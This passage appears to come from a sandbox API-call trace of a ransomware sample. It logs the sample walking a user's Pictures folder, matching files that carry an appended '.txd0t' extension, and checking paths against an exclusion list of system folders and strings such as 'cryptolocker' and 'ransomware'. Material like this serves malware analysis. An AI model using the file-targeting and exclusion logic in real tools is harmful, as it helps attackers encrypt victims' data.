psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.271] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="e0RUl3aLEh6brT_yeUb0.jpg.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\e0RUl3aLEh6brT_yeUb0.jpg.txd0t" [0090.271] PathFindExtensionW (pszPath="e0RUl3aLEh6brT_yeUb0.jpg.txd0t") returned=".txd0t" [0090.271] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.271] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91351d40, ftCreationTime.dwHighDateTime=0x1d5e178, ftLastAccessTime.dwLowDateTime=0x3aeb9590, ftLastAccessTime.dwHighDateTime=0x1d5eb4b, ftLastWriteTime.dwLowDateTime=0x528756de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x120d8, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="EVRLdIxDOIvB-Fc9_h.gif.txd0t", cAlternateFileName="EVRLDI~1.TXD")) returned 1 [0090.271] StrCmpW (psz1="EVRLdIxDOIvB-Fc9_h.gif.txd0t", psz2=".") returned 1 [0090.271] StrCmpW (psz1="EVRLdIxDOIvB-Fc9_h.gif.txd0t", psz2="..") returned 1 [0090.271] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.271] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.271] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="EVRLdIxDOIvB-Fc9_h.gif.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t" [0090.271] PathFindExtensionW (pszPath="EVRLdIxDOIvB-Fc9_h.gif.txd0t") returned=".txd0t" [0090.271] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.271] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85808c0, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0xbac47e50, ftLastAccessTime.dwHighDateTime=0x1d5e3ab, ftLastWriteTime.dwLowDateTime=0x5289b9f7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18f51, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="iRuE37I4VoTmYoZQwpA.png.txd0t", cAlternateFileName="IRUE37~1.TXD")) returned 1 [0090.271] StrCmpW (psz1="iRuE37I4VoTmYoZQwpA.png.txd0t", psz2=".") returned 1 [0090.271] StrCmpW (psz1="iRuE37I4VoTmYoZQwpA.png.txd0t", psz2="..") returned 1 [0090.271] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.271] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.271] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="iRuE37I4VoTmYoZQwpA.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\iRuE37I4VoTmYoZQwpA.png.txd0t" [0090.271] PathFindExtensionW (pszPath="iRuE37I4VoTmYoZQwpA.png.txd0t") returned=".txd0t" [0090.271] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.271] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ee270, ftCreationTime.dwHighDateTime=0x1d5efb0, ftLastAccessTime.dwLowDateTime=0x85fba70, ftLastAccessTime.dwHighDateTime=0x1d5e9ed, ftLastWriteTime.dwLowDateTime=0x5289b9f7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11f46, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Kiw0vwA10s0.png.txd0t", cAlternateFileName="KIW0VW~1.TXD")) returned 1 [0090.271] StrCmpW (psz1="Kiw0vwA10s0.png.txd0t", psz2=".") returned 1 [0090.271] StrCmpW (psz1="Kiw0vwA10s0.png.txd0t", psz2="..") returned 1 [0090.271] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.271] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.271] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="Kiw0vwA10s0.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t" [0090.271] PathFindExtensionW (pszPath="Kiw0vwA10s0.png.txd0t") returned=".txd0t" [0090.271] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.272] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf35bee50, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x252c0490, ftLastAccessTime.dwHighDateTime=0x1d5e968, ftLastWriteTime.dwLowDateTime=0x528c1b40, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14f19, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="O7DPIcWP9p.jpg.txd0t", cAlternateFileName="O7DPIC~1.TXD")) returned 1 [0090.272] StrCmpW (psz1="O7DPIcWP9p.jpg.txd0t", psz2=".") returned 1 [0090.272] StrCmpW (psz1="O7DPIcWP9p.jpg.txd0t", psz2="..") returned 1 [0090.272] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.272] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.272] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="O7DPIcWP9p.jpg.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg.txd0t" [0090.272] PathFindExtensionW (pszPath="O7DPIcWP9p.jpg.txd0t") returned=".txd0t" [0090.272] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.272] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x640e3430, ftCreationTime.dwHighDateTime=0x1d5f075, ftLastAccessTime.dwLowDateTime=0x2dd5b5e0, ftLastAccessTime.dwHighDateTime=0x1d5e581, ftLastWriteTime.dwLowDateTime=0x528e7d69, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13891, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="qC_RZrVpYkb.bmp.txd0t", cAlternateFileName="QC_RZR~1.TXD")) returned 1 [0090.272] StrCmpW (psz1="qC_RZrVpYkb.bmp.txd0t", psz2=".") returned 1 [0090.272] StrCmpW (psz1="qC_RZrVpYkb.bmp.txd0t", psz2="..") returned 1 [0090.272] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.272] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.272] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="qC_RZrVpYkb.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t" [0090.272] PathFindExtensionW (pszPath="qC_RZrVpYkb.bmp.txd0t") returned=".txd0t" [0090.272] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.272] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f8140, ftCreationTime.dwHighDateTime=0x1d5e23d, ftLastAccessTime.dwLowDateTime=0x5c019460, ftLastAccessTime.dwHighDateTime=0x1d5e2d0, ftLastWriteTime.dwLowDateTime=0x5290e1f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15d62, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="QQo9Vv.bmp.txd0t", cAlternateFileName="QQO9VV~1.TXD")) returned 1 [0090.272] StrCmpW (psz1="QQo9Vv.bmp.txd0t", psz2=".") returned 1 [0090.272] StrCmpW (psz1="QQo9Vv.bmp.txd0t", psz2="..") returned 1 [0090.272] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.272] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.275] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="QQo9Vv.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t" [0090.275] PathFindExtensionW (pszPath="QQo9Vv.bmp.txd0t") returned=".txd0t" [0090.275] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.275] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe8c1790, ftCreationTime.dwHighDateTime=0x1d5e190, ftLastAccessTime.dwLowDateTime=0x372d81b0, ftLastAccessTime.dwHighDateTime=0x1d5edf4, ftLastWriteTime.dwLowDateTime=0x5290e1f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd706, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="VM0 JSKujUy.jpg.txd0t", cAlternateFileName="VM0JSK~1.TXD")) returned 1 [0090.275] StrCmpW (psz1="VM0 JSKujUy.jpg.txd0t", psz2=".") returned 1 [0090.275] StrCmpW (psz1="VM0 JSKujUy.jpg.txd0t", psz2="..") returned 1 [0090.275] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.275] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.275] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="VM0 JSKujUy.jpg.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t" [0090.275] PathFindExtensionW (pszPath="VM0 JSKujUy.jpg.txd0t") returned=".txd0t" [0090.275] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.275] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5f92080, ftCreationTime.dwHighDateTime=0x1d5e937, ftLastAccessTime.dwLowDateTime=0x141a96f0, ftLastAccessTime.dwHighDateTime=0x1d5e222, ftLastWriteTime.dwLowDateTime=0x52934366, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18749, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="wAVErpzAz.png.txd0t", cAlternateFileName="WAVERP~1.TXD")) returned 1 [0090.275] StrCmpW (psz1="wAVErpzAz.png.txd0t", psz2=".") returned 1 [0090.275] StrCmpW (psz1="wAVErpzAz.png.txd0t", psz2="..") returned 1 [0090.275] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.275] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.275] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="wAVErpzAz.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t" [0090.275] PathFindExtensionW (pszPath="wAVErpzAz.png.txd0t") returned=".txd0t" [0090.275] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.275] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa578d1a0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x87e119b0, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0x52934366, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17d83, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="xYVA6nzw2.bmp.txd0t", cAlternateFileName="XYVA6N~1.TXD")) returned 1 [0090.275] StrCmpW (psz1="xYVA6nzw2.bmp.txd0t", psz2=".") returned 1 [0090.275] StrCmpW (psz1="xYVA6nzw2.bmp.txd0t", psz2="..") returned 1 [0090.275] StrCpyNW (in: psz1=0xedb108, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0090.275] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0090.275] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="xYVA6nzw2.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t" [0090.275] PathFindExtensionW (pszPath="xYVA6nzw2.bmp.txd0t") returned=".txd0t" [0090.275] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.275] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa578d1a0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x87e119b0, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0x52934366, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17d83, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="xYVA6nzw2.bmp.txd0t", cAlternateFileName="XYVA6N~1.TXD")) returned 0 [0090.276] FindClose (in: hFindFile=0xec20f0 | out: hFindFile=0xec20f0) returned 1 [0090.276] GetProcessHeap () returned 0xe30000 [0090.276] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedb108 | out: hHeap=0xe30000) returned 1 [0090.276] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x779d7ee0, ftCreationTime.dwHighDateTime=0x1d5ed4e, ftLastAccessTime.dwLowDateTime=0xc4854390, ftLastAccessTime.dwHighDateTime=0x1d5e949, ftLastWriteTime.dwLowDateTime=0x5295a591, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbf03, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="msDAnVl Vs INrTL.jpg.txd0t", cAlternateFileName="MSDANV~1.TXD")) returned 1 [0090.276] StrCmpW (psz1="msDAnVl Vs INrTL.jpg.txd0t", psz2=".") returned 1 [0090.276] StrCmpW (psz1="msDAnVl Vs INrTL.jpg.txd0t", psz2="..") returned 1 [0090.276] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.276] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.276] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="msDAnVl Vs INrTL.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t" [0090.276] PathFindExtensionW (pszPath="msDAnVl Vs INrTL.jpg.txd0t") returned=".txd0t" [0090.276] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.276] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38c320d0, ftCreationTime.dwHighDateTime=0x1d5e899, ftLastAccessTime.dwLowDateTime=0xa9ae02d0, ftLastAccessTime.dwHighDateTime=0x1d5eb67, ftLastWriteTime.dwLowDateTime=0x5295a591, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1dc4, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="nDbY.bmp.txd0t", cAlternateFileName="NDBYBM~1.TXD")) returned 1 [0090.276] StrCmpW (psz1="nDbY.bmp.txd0t", psz2=".") returned 1 [0090.276] StrCmpW (psz1="nDbY.bmp.txd0t", psz2="..") returned 1 [0090.276] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.276] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.276] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="nDbY.bmp.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t" [0090.276] PathFindExtensionW (pszPath="nDbY.bmp.txd0t") returned=".txd0t" [0090.276] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.276] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87624400, ftCreationTime.dwHighDateTime=0x1d5e92a, ftLastAccessTime.dwLowDateTime=0x4b8617f0, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0x5298074d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18b8f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="oOTvWfHAVr.png.txd0t", cAlternateFileName="OOTVWF~1.TXD")) returned 1 [0090.276] StrCmpW (psz1="oOTvWfHAVr.png.txd0t", psz2=".") returned 1 [0090.276] StrCmpW (psz1="oOTvWfHAVr.png.txd0t", psz2="..") returned 1 [0090.276] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.276] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.276] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="oOTvWfHAVr.png.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t" [0090.276] PathFindExtensionW (pszPath="oOTvWfHAVr.png.txd0t") returned=".txd0t" [0090.276] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.276] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0090.276] StrCmpW (psz1="Saved Pictures", psz2=".") returned 1 [0090.277] StrCmpW (psz1="Saved Pictures", psz2="..") returned 1 [0090.277] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0090.277] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0090.277] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Saved Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\boot\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\programdata\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\drivers\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\wsus\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="crypt_detect") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="cryptolocker") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="ransomware") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0090.277] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", 